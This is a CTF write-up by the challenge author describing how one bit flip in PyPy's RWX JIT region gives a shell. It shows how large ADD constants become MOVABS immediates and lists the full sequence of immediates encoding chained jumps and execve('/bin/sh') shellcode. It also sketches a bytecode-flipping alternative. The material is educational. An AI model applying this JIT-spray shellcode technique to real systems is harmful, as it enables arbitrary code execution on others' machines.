Author: mebeim (Marco Bonelli)
Full source code of the challenge is available here
I had written a perfect program, when all of a sudden… a cosmic ray was enough to pwn my entire system :(
Description#
For a TL;DR of the solution, just check the comments in expl.py
.
The challenge consists of a simple Python 3 program (app.py
) ran
by the PyPy interpreter that implements a CLI to create and invoke
custom Python lambda
functions. These functions can be created using a limited
set of whitelisted operations, take a single argument and return a single value.
Available commands:
[B]uild a function
[C]all a function
[L]ist functions
[T]rigger a cosmic ray
> B
Name: foo
Input one operation per line, end with "END":
> ADD 10
> MUL 2
> REPEAT 5
> LIST
> END
Function created!
> L
Currently defined functions:
foo = lambda x: list(((((x) + 10) * 2) for _ in range(5)))
> C
Name: foo
Argument: 1
Result: [22, 22, 22, 22, 22]
Other than that, the script also offers an interesting functionality (cosmic ray) that allows the user to flip a bit in certain memory areas:
try:
where = int(input('Where? '), 0)
except ValueError:
raise ValueError('Invalid input') from None
offset = where // 8
bit = where % 8
# ... scan /proc/self/maps and calculate vaddr
from cffi import FFI
FFI().cast("unsigned char *", vaddr)[0] ^= (1 << bit)
This bit flip is only allowed in writeable anonymous memory areas, excluding the process stack, and is also only allowed once due to a global variable that is set after first usage.
Goal#
The goal is clear: achieve arbitrary code execution to read the contents of the
/flag
file. The memory areas where the bit flip is allowed are pretty much
limited to a handful of anonymous mappings: the interpreter heap (brk), the
Python heap (where most Python objects live) and a RWX mapping used by PyPy to
JIT compile Python code whenever it deems it necessary. Anything else is
seemingly untouchable (bad permissions and/or non-anonymous).
$ sudo cat /proc/$(pidof pypy3)/maps
5e177bf9f000-5e177bfa0000 r--p 00000000 00:43 21012271 /usr/bin/pypy3.10-c
5e177bfa0000-5e177bfa1000 r-xp 00001000 00:43 21012271 /usr/bin/pypy3.10-c
5e177bfa1000-5e177bfa2000 r--p 00002000 00:43 21012271 /usr/bin/pypy3.10-c
5e177bfa2000-5e177bfa3000 r--p 00002000 00:43 21012271 /usr/bin/pypy3.10-c
5e177bfa3000-5e177bfa4000 rw-p 00003000 00:43 21012271 /usr/bin/pypy3.10-c
5e178c01a000-5e178c01b000 ---p 00000000 00:00 0 [heap]
5e178c01b000-5e178c01e000 rw-p 00000000 00:00 0 [heap]
7a2d7cf60000-7a2d7d0d0000 rw-p 00000000 00:00 0
7a2d7d0d0000-7a2d7d1d0000 rwxp 00000000 00:00 0
7a2d7d1f1000-7a2d7e9c3000 rw-p 00000000 00:00 0
...
Since the script only allows for one bit flip to happen, a viable solution must either achieve arbitrary code execution via a single bit flip or use the initial bit flip to disable the global variable check and allow for more (preferably unlimited) bit flips.
Solution#
There are two main solution paths, although one of them remains theoretical and I have not spent too much time investigating its feasibility. It is however worth mentioning (find it below).
Altering JITed Code#
As you might already know, PyPy3 is known for its ability to Just-In-Time
compile Python code into machine code (in this case, x86-64). This is done only
if deemed necessary by the interpreter, which means only for “hot” loops. For
example, a long enough loop doing calculations or an infinite while True
loop
are highly likely to be JITed. The JITed code is written to and executed
directly from a RWX memory region. This is a prime target for a “cosmic ray”.
We can create a “hot” loop within a lambda
function with the REPEAT
operation, which translates to ((EXPR) for _ in range(N))
where N
is
controlled and EXPR
comes from previous operations (also controlled).
A very simple lambda built with ADD 0x1122334455
+ REPEAT 9999
+ LIST
will
be JITed by PyPy at a deterministic offset into the RWX JIT memory area. What’s
more interesting is that a large enough constant (between 5 and 8 bytes) will
most likely get embedded as is into JITed code as an immediate for the x86
MOVABS instruction (a.k.a. MOV r64, imm64). We can also notice this
in the PyPy codebase. This is also useful to find the
address/offset of a specific piece of JITed code from GDB:
$ sudo pwndbg --pid $(pidof pypy3)
pwndbg> search -t qword --trunc-out 73588229205
Searching for an 8-byte integer: b'UD3"\x11\x00\x00\x00'
[anon_7081faf76] 0x7081faf78679 push rbp /* 0x1122334455 */
[anon_7081faf76] 0x7081faf78945 push rbp /* 0x1122334455 */
...
pwndbg> x/10i 0x7081faf78679 - 2
0x7081faf78677: movabs r11,0x1122334455
0x7081faf78681: add rdi,r11
0x7081faf78684: jo 0x7081faf78c17
Doing simple mathematical operations with large values gives us a very good primitive to inject arbitrary bytes into JITed code via MOVABS. Other ways are definitely possible, but MOVABS gives us a lot of space. In particular, we have 8 controlled immediate bytes ending up in a RWX region. If we can somehow flip some bit around the JITed code to jump into the immediate, we can use the first 6 to run some arbitrary code, and the last two to perform a short jump into the immediate of a subsequent MOVABS instruction to continue.
A lambda
built with a sequence of arithmetical instructions with large
immediates can easily turn into a sequence of MOVABS instructions. For example:
ADD 0x1122334455
ADD 0x2233445566
ADD 0x3344556677
REPEAT 10000
LIST
END
Will become something like:
...
movabs r11,0x1122334455
add rdi,r11
jo 0x7bcffd7a0c87
mov QWORD PTR [rbx+0x28],0xe
mov QWORD PTR [rbp+0x158],rdi
movabs r11,0x2233445566
add rdi,r11
jo 0x7bcffd7a0ca3
mov QWORD PTR [rbx+0x28],0x12
mov QWORD PTR [rbp+0x158],rdi
movabs r11,0x3344556677
add rdi,r11
jo 0x7bcffd7a0cbf
...
Taking a look at how MOVABS is encoded, we have:
49 bb 55 44 33 22 11 00 00 00 movabs r11, 0x1122334455
Flipping bit 3 of the second byte turns the instruction into:
49 b3 55 rex.WB mov r11b, 0x55
44 33 22 xor r12d, DWORD PTR [rdx]
11 00 adc DWORD PTR [rax], eax
...
Other variations are also possible, like:
49 9b rex.WB fwait
55 push rbp
44 33 22 xor r12d, DWORD PTR [rdx]
11 00 adc DWORD PTR [rax], eax
...
fwait
… you really never stop learning new x86 instructions, huh?
One single bit flip is therefore enough to start executing part of the original MOVABS immediate we provide as code. We can encode an initial JMP ahead into the next immediate, perform some instructions, JMP imm8 to the next, and repeat. This is more than enough to pop a shell.
The only thing we must pay attention to is a small optimization performed by the
PyPy JIT compiler when dealing with consecutive integer values that are “close
enough” to each other (within 32-bit distance). Doing the same as above with
ADD 0x1122334455
followed by ADD 0x1122334466
will JIT compile into:
movabs r11,0x1122334455
add rdi,r11
jo 0x7a721ea94c47
mov QWORD PTR [rbx+0x28],0xe
mov QWORD PTR [rbp+0x158],rdi
lea r11,[r11+0x11] <<<<<<
add rdi,r11
jo 0x7a721ea94c63
Not a problem if our immediates are “far enough” from each other in value, but even then, all is fine with a bit of juggling around.
Now it’s GG. We can read in more shellcode, run existing code (we can definitely
break ASLR now), or even just directly pop a shell via execve
. The final
sequence of instructions I used to call
execve("/bin/sh", {"/bin/sh", NULL}, NULL)
looks like this:
ADD 0x01010101011ceb90 -> jmp short $+0x1e
ADD 0x17eb900068732f68 -> push 0x68732f '/sh\x00'
jmp short $+0x19
ADD 0x17eb90102424c148 -> shl qword ptr [rsp], 16
jmp short $+0x19
ADD 0x17eb6e6924048166 -> add word ptr [rsp], 0x6e69 'in'
jmp short $+0x19
ADD 0x17eb90102424c148 -> shl qword ptr [rsp], 16
jmp short $+0x19
ADD 0x616161000000ede9 -> jmp $+0xf2
ADD 0x61eb622f24048166 -> add word ptr [rsp], 0x622f '/b'
jmp short $+0x63
ADD 0x61eb90006ae78948 -> mov rdi, rsp rdi = "/bin/sh"
push 0
jmp short $+0x63
ADD 0x61eb9090e6894857 -> push rdi
mov rsi, rsp rsi = {"/bin/sh", NULL}
jmp short $+0x63
ADD 0x61eb3bb0c031d231 -> xor edx, edx rdx = NULL
xor eax, eax
mov al, 0x3b rax = __NR_execve
jmp short $+0x63
ADD 0x61eb90909090050f -> syscall
REPEAT 10000
LIST
The first instruction is changed from movabs r11, 0x01010101011ceb90
to
rex.WB mov r11b, 0x90; jmp short $+0x1e
, which starts the whole thing. The
only quirk about this solution is that after a few MOVABS instructions PyPy
inserts additional checks in the JITed code, causing the offset between
subsequent MOVABS to change. There is also a big gap in the middle where I have
to waste an entire immediate to fit a JMP off32 (5 bytes). In any case, no big
deal.
Alternate Solution: Altering Python Bytecode#
As we all know Python is an interpreted language with an intermediate bytecode representation that is executed by the interpreter virtual machine. Instead of focusing on what happens after the PyPy JIT kicks in, we could also alter the Python bytecode itself. Assuming that the bytecode for script functions is stored in one of the memory areas we can modify, and assuming that its offset is fixed (or at least stable enough), flipping a bit to modify the bytecode can drastically modify the script’s behavior.
There is no obvious way to use a single bit flip to obtain arbitrary [byte]code execution, let alone re-use some part of existing bytecode to open, read and print the contents of an arbitrary file. If we want to modify bytecode we will have to do so to bypass the single cosmic ray limit, and then use more cosmic rays to edit existing bytecode at will.
If we take a look at the bytecode for the cosmic_ray()
function using
dis.dis()
we can see a few interesting spots where flipping a
bit would result in bypassing the global variable check, allowing infinite
“cosmic rays” to hit. We can also access the raw bytecode as a bytes
object
via cosmic_ray.__code__.co_code
to check actual opcodes and arguments.
Some interestig opcodes to consider for the bit flip are right at the start and towards the end of the function:
0 LOAD_GLOBAL 0 (COSMIC_RAY_HIT)
2 POP_JUMP_IF_FALSE 8 (to 16)
...
324 LOAD_CONST 22 (True)
326 STORE_GLOBAL 0 (COSMIC_RAY_HIT)
...
The opcode for POP_JUMP_IF_FALSE
is 0x72: flipping its LSB turns it into 0x73,
which is POP_JUMP_IF_TRUE
. This would simply negate the if
condition and
allow for unlimited cosmic rays after the first call to the function (which sets
COSMIC_RAY_HIT = True
befor return).
Similarly, changing the argument for STORE_GLOBAL
to something other than 0
would cause the script to create a new global variable instead of modifying
COSMIC_RAY_HIT
. Modifying one of the above opcodes into something else may
also work, depending on the specific case.
There are however a couple of problems with this approach:
- We are working with offsets into memory, and not absolute addresses. While
the memory layout seems pretty stable at first, the
cosmic_ray()
functions imports thecffi
module, causing a bunch of mappings to be created and also moving existing Python objects around. This results in a not-so-predictable layout after the first invocation. Subsequent invocations to perform more bit flips would need to take this into account. - Depending on which opcode we choose to modify and how, we might end up
crashing the interpreter either via internal check failures or plain and
simple segmentation faults. For example, I have noticed that changing
STORE_GLOBAL 0
toSTORE_GLOBAL 8
(thus creatingFFI = True
globally) works on Ubuntu 24pypy3
, but crashes with a HLT for Alpinepypy3
(used in the challenge container). YMMV.
This is the main reason I did not explore this solution path any further. It does however still seem within the realm of possibility.
Complete Exploit#
See expl.py
for the complete exploit. A simplified version is
available at checker/__main__.py
and is intended to be
used as an automated status check.